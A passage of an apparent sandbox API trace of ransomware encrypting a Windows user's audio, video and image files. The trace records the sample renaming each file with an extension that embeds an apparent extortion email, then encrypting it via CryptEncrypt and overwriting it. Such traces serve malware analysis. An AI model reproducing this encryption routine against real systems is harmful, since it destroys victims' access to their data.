(lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav") returned 68 [0167.103] GetProcessHeap () returned 0x2e0000 [0167.103] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xee) returned 0x319c88 [0167.103] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav" [0167.103] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0167.103] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nrtxrlktuem6kcwq_.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nrtxrlktuem6kcwq_.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.106] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nrtxrlktuem6kcwq_.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.106] GetProcessHeap () returned 0x2e0000 [0167.106] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0167.106] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=88317) returned 1 [0167.107] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x158fd [0167.107] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.107] GetProcessHeap () returned 0x2e0000 [0167.107] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.107] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.107] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.108] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.108] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.108] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x158fd, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x158fd, lpOverlapped=0x0) returned 1 [0167.110] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-88317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.111] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x158fd, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x158fd, lpOverlapped=0x0) returned 1 [0167.111] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.111] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.111] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav", dwFileAttributes=0x80) returned 1 [0167.112] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav") returned 56 [0167.112] GetProcessHeap () returned 0x2e0000 [0167.112] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd6) returned 0x30a498 [0167.112] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav" [0167.112] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0167.112] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mqt7f.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mqt7f.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.115] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mQT7F.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mqt7f.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.115] GetProcessHeap () returned 0x2e0000 [0167.115] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.115] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=80077) returned 1 [0167.115] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x138cd [0167.115] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.115] GetProcessHeap () returned 0x2e0000 [0167.115] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.115] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.116] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.116] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.116] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.117] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x138cd, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x138cd, lpOverlapped=0x0) returned 1 [0167.117] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-80077, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.117] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x138cd, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x138cd, lpOverlapped=0x0) returned 1 [0167.118] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.118] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.118] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4", dwFileAttributes=0x80) returned 1 [0167.118] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4") returned 56 [0167.118] GetProcessHeap () returned 0x2e0000 [0167.118] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd6) returned 0x30a498 [0167.118] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4" [0167.118] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4.12781717671972518758.ex_parvis@aol.com.AIR" [0167.118] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mbtjr.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mbtjr.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.122] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBTjR.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mbtjr.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.122] GetProcessHeap () returned 0x2e0000 [0167.122] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.122] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=81100) returned 1 [0167.122] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x13ccc [0167.122] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.122] GetProcessHeap () returned 0x2e0000 [0167.122] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.122] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.122] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.123] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.123] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.123] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x13ccc, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x13ccc, lpOverlapped=0x0) returned 1 [0167.124] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-81100, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.124] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x13ccc, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x13ccc, lpOverlapped=0x0) returned 1 [0167.124] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.124] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.124] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png", dwFileAttributes=0x80) returned 1 [0167.125] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png") returned 70 [0167.125] GetProcessHeap () returned 0x2e0000 [0167.125] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf2) returned 0x319c88 [0167.125] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png" [0167.125] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png.12781717671972518758.ex_parvis@aol.com.AIR" [0167.125] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k9sf9ddtedhlikfkqqr.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k9sf9ddtedhlikfkqqr.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.128] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k9sF9DdtEDHLikFKqQR.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k9sf9ddtedhlikfkqqr.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.128] GetProcessHeap () returned 0x2e0000 [0167.128] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0167.128] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=89402) returned 1 [0167.128] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15d3a [0167.128] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.128] GetProcessHeap () returned 0x2e0000 [0167.128] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.128] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.128] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.129] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.129] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.129] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x15d3a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x15d3a, lpOverlapped=0x0) returned 1 [0167.130] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-89402, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.130] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x15d3a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x15d3a, lpOverlapped=0x0) returned 1 [0167.131] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.131] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.131] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi", dwFileAttributes=0x80) returned 1 [0167.131] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi") returned 68 [0167.131] GetProcessHeap () returned 0x2e0000 [0167.131] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xee) returned 0x30a498 [0167.131] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi" [0167.131] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi.12781717671972518758.ex_parvis@aol.com.AIR" [0167.131] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jbhhpnqhrj0wox8jq.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jbhhpnqhrj0wox8jq.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.135] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JBHhPNQhRj0WoX8jq.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jbhhpnqhrj0wox8jq.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.135] GetProcessHeap () returned 0x2e0000 [0167.135] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.135] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=35154) returned 1 [0167.135] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x8952 [0167.135] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.135] GetProcessHeap () returned 0x2e0000 [0167.135] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.135] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.135] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.136] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.136] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.136] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x8952, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x8952, lpOverlapped=0x0) returned 1 [0167.137] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-35154, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.137] WriteFile (in: hFile=0x52c, lpBuffer=0x3bad70*, nNumberOfBytesToWrite=0x8952, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3bad70*, lpNumberOfBytesWritten=0x2acf9c8*=0x8952, lpOverlapped=0x0) returned 1 [0167.138] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.138] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.138] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg", dwFileAttributes=0x80) returned 1 [0167.138] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg") returned 57 [0167.138] GetProcessHeap () returned 0x2e0000 [0167.139] RtlAllocateHeap (HeapHandle=0x2e0000, 